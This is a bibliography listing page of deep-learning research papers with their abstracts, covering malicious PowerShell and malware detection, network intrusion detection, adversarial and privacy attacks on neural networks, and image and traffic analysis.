Visible to the public Biblio

Found 631 results

Filters: Keyword is Deep Learning  [Clear All Filters]
2019-01-16
Hendler, Danny, Kels, Shay, Rubin, Amir.  2018.  Detecting Malicious PowerShell Commands Using Deep Neural Networks. Proceedings of the 2018 on Asia Conference on Computer and Communications Security. :187–197.

Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. Based on Microsoft's .NET framework, it includes an interface that allows programmers to access operating system services. While PowerShell can be configured by administrators for restricting access and reducing vulnerabilities, these restrictions can be bypassed. Moreover, PowerShell commands can be easily generated dynamically, executed from memory, encoded and obfuscated, thus making the logging and forensic analysis of code executed by PowerShell challenging. For all these reasons, PowerShell is increasingly used by cybercriminals as part of their attacks' tool chain, mainly for downloading malicious contents and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to PowerShell's abuse by cybercrimials [52] reported on a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need of developing effective methods for detecting malicious PowerShell commands. In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). Detectors' performance was evaluated using a large real-world dataset. Our evaluation results show that, although our detectors (and especially the traditional NLP-based ones) individually yield high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier provides the best performance, since the latter classifier is able to detect malicious commands that succeed in evading the former. Our analysis of these evasive commands reveals that some obfuscation patterns automatically detected by the CNN classifier are intrinsically difficult to detect using the NLP techniques we applied. Our detectors provide high recall values while maintaining a very low false positive rate, making us cautiously optimistic that they can be of practical value.

2018-12-10
Oyekanlu, E..  2018.  Distributed Osmotic Computing Approach to Implementation of Explainable Predictive Deep Learning at Industrial IoT Network Edges with Real-Time Adaptive Wavelet Graphs. 2018 IEEE First International Conference on Artificial Intelligence and Knowledge Engineering (AIKE). :179–188.
Challenges associated with developing analytics solutions at the edge of large scale Industrial Internet of Things (IIoT) networks close to where data is being generated in most cases involves developing analytics solutions from ground up. However, this approach increases IoT development costs and system complexities, delay time to market, and ultimately lowers competitive advantages associated with delivering next-generation IoT designs. To overcome these challenges, existing, widely available, hardware can be utilized to successfully participate in distributed edge computing for IIoT systems. In this paper, an osmotic computing approach is used to illustrate how distributed osmotic computing and existing low-cost hardware may be utilized to solve complex, compute-intensive Explainable Artificial Intelligence (XAI) deep learning problem from the edge, through the fog, to the network cloud layer of IIoT systems. At the edge layer, the C28x digital signal processor (DSP), an existing low-cost, embedded, real-time DSP that has very wide deployment and integration in several IoT industries is used as a case study for constructing real-time graph-based Coiflet wavelets that could be used for several analytic applications including deep learning pre-processing applications at the edge and fog layers of IIoT networks. Our implementation is the first known application of the fixed-point C28x DSP to construct Coiflet wavelets. Coiflet Wavelets are constructed in the form of an osmotic microservice, using embedded low-level machine language to program the C28x at the network edge. With the graph-based approach, it is shown that an entire Coiflet wavelet distribution could be generated from only one wavelet stored in the C28x based edge device, and this could lead to significant savings in memory at the edge of IoT networks. Pearson correlation coefficient is used to select an edge generated Coiflet wavelet and the selected wavelet is used at the fog layer for pre-processing and denoising IIoT data to improve data quality for fog layer based deep learning application. Parameters for implementing deep learning at the fog layer using LSTM networks have been determined in the cloud. For XAI, communication network noise is shown to have significant impact on results of predictive deep learning at IIoT network fog layer.
Azmoodeh, A., Dehghantanha, A., Choo, K. R..  2018.  Robust Malware Detection for Internet Of (Battlefield) Things Devices Using Deep Eigenspace Learning. IEEE Transactions on Sustainable Computing. :1–1.

Internet of Things (IoT) in military setting generally consists of a diverse range of Internet-connected devices and nodes (e.g. medical devices to wearable combat uniforms), which are a valuable target for cyber criminals, particularly state-sponsored or nation state actors. A common attack vector is the use of malware. In this paper, we present a deep learning based method to detect Internet Of Battlefield Things (IoBT) malware via the device's Operational Code (OpCode) sequence. We transmute OpCodes into a vector space and apply a deep Eigenspace learning approach to classify malicious and bening application. We also demonstrate the robustness of our proposed approach in malware detection and its sustainability against junk code insertion attacks. Lastly, we make available our malware sample on Github, which hopefully will benefit future research efforts (e.g. for evaluation of proposed malware detection approaches).

Yang, Dejian, Wang, Senzhang, Li, Chaozhuo, Zhang, Xiaoming, Li, Zhoujun.  2017.  From Properties to Links: Deep Network Embedding on Incomplete Graphs. Proceedings of the 2017 ACM on Conference on Information and Knowledge Management. :367–376.
As an effective way of learning node representations in networks, network embedding has attracted increasing research interests recently. Most existing approaches use shallow models and only work on static networks by extracting local or global topology information of each node as the algorithm input. It is challenging for such approaches to learn a desirable node representation on incomplete graphs with a large number of missing links or on dynamic graphs with new nodes joining in. It is even challenging for them to deeply fuse other types of data such as node properties into the learning process to help better represent the nodes with insufficient links. In this paper, we for the first time study the problem of network embedding on incomplete networks. We propose a Multi-View Correlation-learning based Deep Network Embedding method named MVC-DNE to incorporate both the network structure and the node properties for more effectively and efficiently perform network embedding on incomplete networks. Specifically, we consider the topology structure of the network and the node properties as two correlated views. The insight is that the learned representation vector of a node should reflect its characteristics in both views. Under a multi-view correlation learning based deep autoencoder framework, the structure view and property view embeddings are integrated and mutually reinforced through both self-view and cross-view learning. As MVC-DNE can learn a representation mapping function, it can directly generate the representation vectors for the new nodes without retraining the model. Thus it is especially more efficient than previous methods. Empirically, we evaluate MVC-DNE over three real network datasets on two data mining applications, and the results demonstrate that MVC-DNE significantly outperforms state-of-the-art methods.
2018-11-19
Chen, Y., Lai, Y., Liu, Y..  2017.  Transforming Photos to Comics Using Convolutional Neural Networks. 2017 IEEE International Conference on Image Processing (ICIP). :2010–2014.

In this paper, inspired by Gatys's recent work, we propose a novel approach that transforms photos to comics using deep convolutional neural networks (CNNs). While Gatys's method that uses a pre-trained VGG network generally works well for transferring artistic styles such as painting from a style image to a content image, for more minimalist styles such as comics, the method often fails to produce satisfactory results. To address this, we further introduce a dedicated comic style CNN, which is trained for classifying comic images and photos. This new network is effective in capturing various comic styles and thus helps to produce better comic stylization results. Even with a grayscale style image, Gatys's method can still produce colored output, which is not desirable for comics. We develop a modified optimization framework such that a grayscale image is guaranteed to be synthesized. To avoid converging to poor local minima, we further initialize the output image using grayscale version of the content image. Various examples show that our method synthesizes better comic images than the state-of-the-art method.

Vu, Ly, Bui, Cong Thanh, Nguyen, Quang Uy.  2017.  A Deep Learning Based Method for Handling Imbalanced Problem in Network Traffic Classification. Proceedings of the Eighth International Symposium on Information and Communication Technology. :333–339.

Network traffic classification is an important problem in network traffic analysis. It plays a vital role in many network tasks including quality of service, firewall enforcement and security. One of the challenging problems of classifying network traffic is the imbalanced property of network data. Usually, the amount of traffic in some classes is much higher than the amount of traffic in other classes. In this paper, we proposed an application of a deep learning approach to address imbalanced data problem in network traffic classification. We used a recent proposed deep network for unsupervised learning called Auxiliary Classifier Generative Adversarial Network to generate synthesized data samples for balancing between the minor and the major classes. We tested our method on a well-known network traffic dataset and the results showed that our proposed method achieved better performance compared to a recent proposed method for handling imbalanced problem in network traffic classification.

Zhang, Chaoyun, Ouyang, Xi, Patras, Paul.  2017.  ZipNet-GAN: Inferring Fine-Grained Mobile Traffic Patterns via a Generative Adversarial Neural Network. Proceedings of the 13th International Conference on Emerging Networking EXperiments and Technologies. :363–375.

Large-scale mobile traffic analytics is becoming essential to digital infrastructure provisioning, public transportation, events planning, and other domains. Monitoring city-wide mobile traffic is however a complex and costly process that relies on dedicated probes. Some of these probes have limited precision or coverage, others gather tens of gigabytes of logs daily, which independently offer limited insights. Extracting fine-grained patterns involves expensive spatial aggregation of measurements, storage, and post-processing. In this paper, we propose a mobile traffic super-resolution technique that overcomes these problems by inferring narrowly localised traffic consumption from coarse measurements. We draw inspiration from image processing and design a deep-learning architecture tailored to mobile networking, which combines Zipper Network (ZipNet) and Generative Adversarial neural Network (GAN) models. This enables to uniquely capture spatio-temporal relations between traffic volume snapshots routinely monitored over broad coverage areas ('low-resolution') and the corresponding consumption at 0.05 km2 level ('high-resolution') usually obtained after intensive computation. Experiments we conduct with a real-world data set demonstrate that the proposed ZipNet(-GAN) infers traffic consumption with remarkable accuracy and up to 100X higher granularity as compared to standard probing, while outperforming existing data interpolation techniques. To our knowledge, this is the first time super-resolution concepts are applied to large-scale mobile traffic analysis and our solution is the first to infer fine-grained urban traffic patterns from coarse aggregates.

Lal, Shamit, Garg, Vineet, Verma, Om Prakash.  2017.  Automatic Image Colorization Using Adversarial Training. Proceedings of the 9th International Conference on Signal Processing Systems. :84–88.

The paper presents a fully automatic end-to-end trainable system to colorize grayscale images. Colorization is a highly under-constrained problem. In order to produce realistic outputs, the proposed approach takes advantage of the recent advances in deep learning and generative networks. To achieve plausible colorization, the paper investigates conditional Wasserstein Generative Adversarial Networks (WGAN) [3] as a solution to this problem. Additionally, a loss function consisting of two classification loss components apart from the adversarial loss learned by the WGAN is proposed. The first classification loss provides a measure of how much the predicted colored images differ from ground truth. The second classification loss component makes use of ground truth semantic classification labels in order to learn meaningful intermediate features. Finally, WGAN training procedure pushes the predictions to the manifold of natural images. The system is validated using a user study and a semantic interpretability test and achieves results comparable to [1] on Imagenet dataset [10].

Sobue, Hideaki, Fukushima, Yuki, Kashiyama, Takahiro, Sekimoto, Yoshihide.  2017.  Flying Object Detection and Classification by Monitoring Using Video Images. Proceedings of the 25th ACM SIGSPATIAL International Conference on Advances in Geographic Information Systems. :57:1–57:4.

In recent years, there has been remarkable development in unmanned aerial vehicle UAVs); certain companies are trying to use the UAV to deliver goods also. Therefore, it is predicted that many such objects will fly over the city, in the near future. This study proposes a system for monitoring objects flying over a city. We use multiple 4K video cameras to capture videos of the flying objects. In this research, we combine background subtraction and a state-of-the-art tracking method, the KCF, for detection and tracking. We use deep learning for classification and the SfM for calculating the 3-dimensional trajectory. A UAV is flown over the inner-city area of Tokyo and videos are captured. The accuracy of each processing is verified, using the videos of objects flying over the city. In each processing, we obtain a certain measure of accuracy; thus, there is a good prospect of creating a system to monitor objects flying, over a city.

Zhu, Yi, Liu, Sen, Newsam, Shawn.  2017.  Large-Scale Mapping of Human Activity Using Geo-Tagged Videos. Proceedings of the 25th ACM SIGSPATIAL International Conference on Advances in Geographic Information Systems. :68:1–68:4.

This paper is the first work to perform spatio-temporal mapping of human activity using the visual content of geo-tagged videos. We utilize a recent deep-learning based video analysis framework, termed hidden two-stream networks, to recognize a range of activities in YouTube videos. This framework is efficient and can run in real time or faster which is important for recognizing events as they occur in streaming video or for reducing latency in analyzing already captured video. This is, in turn, important for using video in smart-city applications. We perform a series of experiments to show our approach is able to map activities both spatially and temporally.

Song, Baolin, Jiang, Hao, Zhao, Li, Huang, Chengwei.  2017.  A Bimodal Biometric Verification System Based on Deep Learning. Proceedings of the International Conference on Video and Image Processing. :89–93.

In order to improve the limitation of single-mode biometric identification technology, a bimodal biometric verification system based on deep learning is proposed in this paper. A modified CNN architecture is used to generate better facial feature for bimodal fusion. The obtained facial feature and acoustic feature extracted by the acoustic feature extraction model are fused together to form the fusion feature on feature layer level. The fusion feature obtained by this method are used to train a neural network of identifying the target person who have these corresponding features. Experimental results demonstrate the superiority and high performance of our bimodal biometric in comparison with single-mode biometrics for identity authentication, which are tested on a bimodal database consists of data coherent from TED-LIUM and CASIA-WebFace. Compared with using facial feature or acoustic feature alone, the classification accuracy of fusion feature obtained by our method is increased obviously.

Pang, Yulei, Xue, Xiaozhen, Wang, Huaying.  2017.  Predicting Vulnerable Software Components Through Deep Neural Network. Proceedings of the 2017 International Conference on Deep Learning Technologies. :6–10.

Vulnerabilities need to be detected and removed from software. Although previous studies demonstrated the usefulness of employing prediction techniques in deciding about vulnerabilities of software components, the improvement of effectiveness of these prediction techniques is still a grand challenging research question. This paper employed a technique based on a deep neural network with rectifier linear units trained with stochastic gradient descent method and batch normalization, for predicting vulnerable software components. The features are defined as continuous sequences of tokens in source code files. Besides, a statistical feature selection algorithm is then employed to reduce the feature and search space. We evaluated the proposed technique based on some Java Android applications, and the results demonstrated that the proposed technique could predict vulnerable classes, i.e., software components, with high precision, accuracy and recall.

Choi, Jun-Ho, Choi, Manri, Choi, Min-Su, Lee, Jong-Seok.  2017.  Impact of Three-Dimensional Video Scalability on Multi-View Activity Recognition Using Deep Learning. Proceedings of the on Thematic Workshops of ACM Multimedia 2017. :135–143.

Human activity recognition is one of the important research topics in computer vision and video understanding. It is often assumed that high quality video sequences are available for recognition. However, relaxing such a requirement and implementing robust recognition using videos having reduced data rates can achieve efficiency in storing and transmitting video data. Three-dimensional video scalability, which refers to the possibility of reducing spatial, temporal, and quality resolutions of videos, is an effective way for flexible representation and management of video data. In this paper, we investigate the impact of the video scalability on multi-view activity recognition. We employ both a spatiotemporal feature extraction-based method and a deep learning-based method using convolutional and recurrent neural networks. The recognition performance of the two methods is examined, along with in-depth analysis regarding how their performance vary with respect to various scalability combinations. In particular, we demonstrate that the deep learning-based method can achieve significantly improved robustness in comparison to the feature-based method. Furthermore, we investigate optimal scalability combinations with respect to bitrate in order to provide useful guidelines for an optimal operation policy in resource-constrained activity recognition systems.

2018-10-15
Jiaqi Yan, Illinois Institute of Technology, Dong Jin, Illinois Institute of Technology, Cheol Won Lee, National Research Institute, South Korea, Ping Liu, Illinois Institute of Technology.  2018.  A Comparative Study of Off-Line Deep Learning Based Network Intrusion Detection. 10th International Conference on Ubiquitous and Future Networks.

Abstract—Network intrusion detection systems (NIDS) are essential security building-blocks for today’s organizations to ensure safe and trusted communication of information. In this paper, we study the feasibility of off-line deep learning based NIDSes by constructing the detection engine with multiple advanced deep learning models and conducting a quantitative and comparative evaluation of those models. We first introduce the general deep learning methodology and its potential implication on the network intrusion detection problem. We then review multiple machine learning solutions to two network intrusion detection tasks (NSL-KDD and UNSW-NB15 datasets). We develop a TensorFlow-based deep learning library, called NetLearner, and implement a handful of cutting-edge deep learning models for NIDS. Finally, we conduct a quantitative and comparative performance evaluation of those models using NetLearner.

2018-06-20
Kebede, T. M., Djaneye-Boundjou, O., Narayanan, B. N., Ralescu, A., Kapp, D..  2017.  Classification of Malware programs using autoencoders based deep learning architecture and its application to the microsoft malware Classification challenge (BIG 2015) dataset. 2017 IEEE National Aerospace and Electronics Conference (NAECON). :70–75.

Distinguishing and classifying different types of malware is important to better understanding how they can infect computers and devices, the threat level they pose and how to protect against them. In this paper, a system for classifying malware programs is presented. The paper describes the architecture of the system and assesses its performance on a publicly available database (provided by Microsoft for the Microsoft Malware Classification Challenge BIG2015) to serve as a benchmark for future research efforts. First, the malicious programs are preprocessed such that they are visualized as gray scale images. We then make use of an architecture comprised of multiple layers (multiple levels of encoding) to carry out the classification process of those images/programs. We compare the performance of this approach against traditional machine learning and pattern recognition algorithms. Our experimental results show that the deep learning architecture yields a boost in performance over those conventional/standard algorithms. A hold-out validation analysis using the superior architecture shows an accuracy in the order of 99.15%.

2018-06-11
Moons, B., Goetschalckx, K., Berckelaer, N. Van, Verhelst, M..  2017.  Minimum energy quantized neural networks. 2017 51st Asilomar Conference on Signals, Systems, and Computers. :1921–1925.
This work targets the automated minimum-energy optimization of Quantized Neural Networks (QNNs) - networks using low precision weights and activations. These networks are trained from scratch at an arbitrary fixed point precision. At iso-accuracy, QNNs using fewer bits require deeper and wider network architectures than networks using higher precision operators, while they require less complex arithmetic and less bits per weights. This fundamental trade-off is analyzed and quantified to find the minimum energy QNN for any benchmark and hence optimize energy-efficiency. To this end, the energy consumption of inference is modeled for a generic hardware platform. This allows drawing several conclusions across different benchmarks. First, energy consumption varies orders of magnitude at iso-accuracy depending on the number of bits used in the QNN. Second, in a typical system, BinaryNets or int4 implementations lead to the minimum energy solution, outperforming int8 networks up to 2-10× at iso-accuracy. All code used for QNN training is available from https://github.com/BertMoons/.
2018-06-07
Aygun, R. C., Yavuz, A. G..  2017.  Network Anomaly Detection with Stochastically Improved Autoencoder Based Models. 2017 IEEE 4th International Conference on Cyber Security and Cloud Computing (CSCloud). :193–198.

Intrusion detection systems do not perform well when it comes to detecting zero-day attacks, therefore improving their performance in that regard is an active research topic. In this study, to detect zero-day attacks with high accuracy, we proposed two deep learning based anomaly detection models using autoencoder and denoising autoencoder respectively. The key factor that directly affects the accuracy of the proposed models is the threshold value which was determined using a stochastic approach rather than the approaches available in the current literature. The proposed models were tested using the KDDTest+ dataset contained in NSL-KDD, and we achieved an accuracy of 88.28% and 88.65% respectively. The obtained results show that, as a singular model, our proposed anomaly detection models outperform any other singular anomaly detection methods and they perform almost the same as the newly suggested hybrid anomaly detection models.

Yang, L., Murmann, B..  2017.  SRAM voltage scaling for energy-efficient convolutional neural networks. 2017 18th International Symposium on Quality Electronic Design (ISQED). :7–12.

State-of-the-art convolutional neural networks (ConvNets) are now able to achieve near human performance on a wide range of classification tasks. Unfortunately, current hardware implementations of ConvNets are memory power intensive, prohibiting deployment in low-power embedded systems and IoE platforms. One method of reducing memory power is to exploit the error resilience of ConvNets and accept bit errors under reduced supply voltages. In this paper, we extensively study the effectiveness of this idea and show that further savings are possible by injecting bit errors during ConvNet training. Measurements on an 8KB SRAM in 28nm UTBB FD-SOI CMOS demonstrate supply voltage reduction of 310mV, which results in up to 5.4× leakage power reduction and up to 2.9× memory access power reduction at 99% of floating-point classification accuracy, with no additional hardware cost. To our knowledge, this is the first silicon-validated study on the effect of bit errors in ConvNets.

Li, Guanpeng, Hari, Siva Kumar Sastry, Sullivan, Michael, Tsai, Timothy, Pattabiraman, Karthik, Emer, Joel, Keckler, Stephen W..  2017.  Understanding Error Propagation in Deep Learning Neural Network (DNN) Accelerators and Applications. Proceedings of the International Conference for High Performance Computing, Networking, Storage and Analysis. :8:1–8:12.
Deep learning neural networks (DNNs) have been successful in solving a wide range of machine learning problems. Specialized hardware accelerators have been proposed to accelerate the execution of DNN algorithms for high-performance and energy efficiency. Recently, they have been deployed in datacenters (potentially for business-critical or industrial applications) and safety-critical systems such as self-driving cars. Soft errors caused by high-energy particles have been increasing in hardware systems, and these can lead to catastrophic failures in DNN systems. Traditional methods for building resilient systems, e.g., Triple Modular Redundancy (TMR), are agnostic of the DNN algorithm and the DNN accelerator's architecture. Hence, these traditional resilience approaches incur high overheads, which makes them challenging to deploy. In this paper, we experimentally evaluate the resilience characteristics of DNN systems (i.e., DNN software running on specialized accelerators). We find that the error resilience of a DNN system depends on the data types, values, data reuses, and types of layers in the design. Based on our observations, we propose two efficient protection techniques for DNN systems.
Liang, Jingxi, Zhao, Wen, Ye, Wei.  2017.  Anomaly-Based Web Attack Detection: A Deep Learning Approach. Proceedings of the 2017 VI International Conference on Network, Communication and Computing. :80–85.
As the era of cloud technology arises, more and more people are beginning to migrate their applications and personal data to the cloud. This makes web-based applications an attractive target for cyber-attacks. As a result, web-based applications now need more protections than ever. However, current anomaly-based web attack detection approaches face the difficulties like unsatisfying accuracy and lack of generalization. And the rule-based web attack detection can hardly fight unknown attacks and is relatively easy to bypass. Therefore, we propose a novel deep learning approach to detect anomalous requests. Our approach is to first train two Recurrent Neural Networks (RNNs) with the complicated recurrent unit (LSTM unit or GRU unit) to learn the normal request patterns using only normal requests unsupervisedly and then supervisedly train a neural network classifier which takes the output of RNNs as the input to discriminate between anomalous and normal requests. We tested our model on two datasets and the results showed that our model was competitive with the state-of-the-art. Our approach frees us from feature selection. Also to the best of our knowledge, this is the first time that the RNN is applied on anomaly-based web attack detection systems.
Chen, Pin-Yu, Zhang, Huan, Sharma, Yash, Yi, Jinfeng, Hsieh, Cho-Jui.  2017.  ZOO: Zeroth Order Optimization Based Black-box Attacks to Deep Neural Networks Without Training Substitute Models. Proceedings of the 10th ACM Workshop on Artificial Intelligence and Security. :15–26.
Deep neural networks (DNNs) are one of the most prominent technologies of our time, as they achieve state-of-the-art performance in many machine learning tasks, including but not limited to image classification, text mining, and speech processing. However, recent research on DNNs has indicated ever-increasing concern on the robustness to adversarial examples, especially for security-critical tasks such as traffic sign identification for autonomous driving. Studies have unveiled the vulnerability of a well-trained DNN by demonstrating the ability of generating barely noticeable (to both human and machines) adversarial images that lead to misclassification. Furthermore, researchers have shown that these adversarial images are highly transferable by simply training and attacking a substitute model built upon the target model, known as a black-box attack to DNNs. Similar to the setting of training substitute models, in this paper we propose an effective black-box attack that also only has access to the input (images) and the output (confidence scores) of a targeted DNN. However, different from leveraging attack transferability from substitute models, we propose zeroth order optimization (ZOO) based attacks to directly estimate the gradients of the targeted DNN for generating adversarial examples. We use zeroth order stochastic coordinate descent along with dimension reduction, hierarchical attack and importance sampling techniques to efficiently attack black-box models. By exploiting zeroth order optimization, improved attacks to the targeted DNN can be accomplished, sparing the need for training substitute models and avoiding the loss in attack transferability. Experimental results on MNIST, CIFAR10 and ImageNet show that the proposed ZOO attack is as effective as the state-of-the-art white-box attack (e.g., Carlini and Wagner's attack) and significantly outperforms existing black-box attacks via substitute models.
Tirumala, Sreenivas Sremath, Narayanan, Ajit.  2017.  Transpositional Neurocryptography Using Deep Learning. Proceedings of the 2017 International Conference on Information Technology. :330–334.

Cryptanalysis (the study of methods to read encrypted information without knowledge of the encryption key) has traditionally been separated into mathematical analysis of weaknesses in cryptographic algorithms, on the one hand, and side-channel attacks which aim to exploit weaknesses in the implementation of encryption and decryption algorithms. Mathematical analysis generally makes assumptions about the algorithm with the aim of reconstructing the key relating plain text to cipher text through brute-force methods. Complexity issues tend to dominate the systematic search for keys. To date, there has been very little research on a third cryptanalysis method: learning the key through convergence based on associations between plain text and cipher text. Recent advances in deep learning using multi-layered artificial neural networks (ANNs) provide an opportunity to reassess the role of deep learning architectures in next generation cryptanalysis methods based on neurocryptography (NC). In this paper, we explore the capability of deep ANNs to decrypt encrypted messages with minimum knowledge of the algorithm. From the experimental results, it can be concluded that DNNs can encrypt and decrypt to levels of accuracy that are not 100% because of the stochastic aspects of ANNs. This aspect may however be useful if communication is under cryptanalysis attack, since the attacker will not know for certain that key K used for encryption and decryption has been found. Also, uncertainty concerning the architecture used for encryption and decryption adds another layer of uncertainty that has no counterpart in traditional cryptanalysis.

Akcay, S., Breckon, T. P..  2017.  An evaluation of region based object detection strategies within X-ray baggage security imagery. 2017 IEEE International Conference on Image Processing (ICIP). :1337–1341.

Here we explore the applicability of traditional sliding window based convolutional neural network (CNN) detection pipeline and region based object detection techniques such as Faster Region-based CNN (R-CNN) and Region-based Fully Convolutional Networks (R-FCN) on the problem of object detection in X-ray security imagery. Within this context, with limited dataset availability, we employ a transfer learning paradigm for network training tackling both single and multiple object detection problems over a number of R-CNN/R-FCN variants. The use of first-stage region proposal within the Faster RCNN and R-FCN provide superior results than traditional sliding window driven CNN (SWCNN) approach. With the use of Faster RCNN with VGG16, pretrained on the ImageNet dataset, we achieve 88.3 mAP for a six object class X-ray detection problem. The use of R-FCN with ResNet-101, yields 96.3 mAP for the two class firearm detection problem requiring 0.1 second computation per image. Overall we illustrate the comparative performance of these techniques as object localization strategies within cluttered X-ray security imagery.

2018-05-24
Hitaj, Briland, Ateniese, Giuseppe, Perez-Cruz, Fernando.  2017.  Deep Models Under the GAN: Information Leakage from Collaborative Deep Learning. Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. :603–618.

Deep Learning has recently become hugely popular in machine learning for its ability to solve end-to-end learning systems, in which the features and the classifiers are learned simultaneously, providing significant improvements in classification accuracy in the presence of highly-structured and large databases. Its success is due to a combination of recent algorithmic breakthroughs, increasingly powerful computers, and access to significant amounts of data. Researchers have also considered privacy implications of deep learning. Models are typically trained in a centralized manner with all the data being processed by the same training algorithm. If the data is a collection of users' private data, including habits, personal pictures, geographical positions, interests, and more, the centralized server will have access to sensitive information that could potentially be mishandled. To tackle this problem, collaborative deep learning models have recently been proposed where parties locally train their deep learning structures and only share a subset of the parameters in the attempt to keep their respective training sets private. Parameters can also be obfuscated via differential privacy (DP) to make information extraction even more challenging, as proposed by Shokri and Shmatikov at CCS'15. Unfortunately, we show that any privacy-preserving collaborative deep learning is susceptible to a powerful attack that we devise in this paper. In particular, we show that a distributed, federated, or decentralized deep learning approach is fundamentally broken and does not protect the training sets of honest participants. The attack we developed exploits the real-time nature of the learning process that allows the adversary to train a Generative Adversarial Network (GAN) that generates prototypical samples of the targeted training set that was meant to be private (the samples generated by the GAN are intended to come from the same distribution as the training data). Interestingly, we show that record-level differential privacy applied to the shared parameters of the model, as suggested in previous work, is ineffective (i.e., record-level DP is not designed to address our attack).

2018-05-09
Dering, M. L., Tucker, C. S..  2017.  Generative Adversarial Networks for Increasing the Veracity of Big Data. 2017 IEEE International Conference on Big Data (Big Data). :2595–2602.

This work describes how automated data generation integrates in a big data pipeline. A lack of veracity in big data can cause models that are inaccurate, or biased by trends in the training data. This can lead to issues as a pipeline matures that are difficult to overcome. This work describes the use of a Generative Adversarial Network to generate sketch data, such as those that might be used in a human verification task. These generated sketches are verified as recognizable using a crowd-sourcing methodology, and finds that the generated sketches were correctly recognized 43.8% of the time, in contrast to human drawn sketches which were 87.7% accurate. This method is scalable and can be used to generate realistic data in many domains and bootstrap a dataset used for training a model prior to deployment.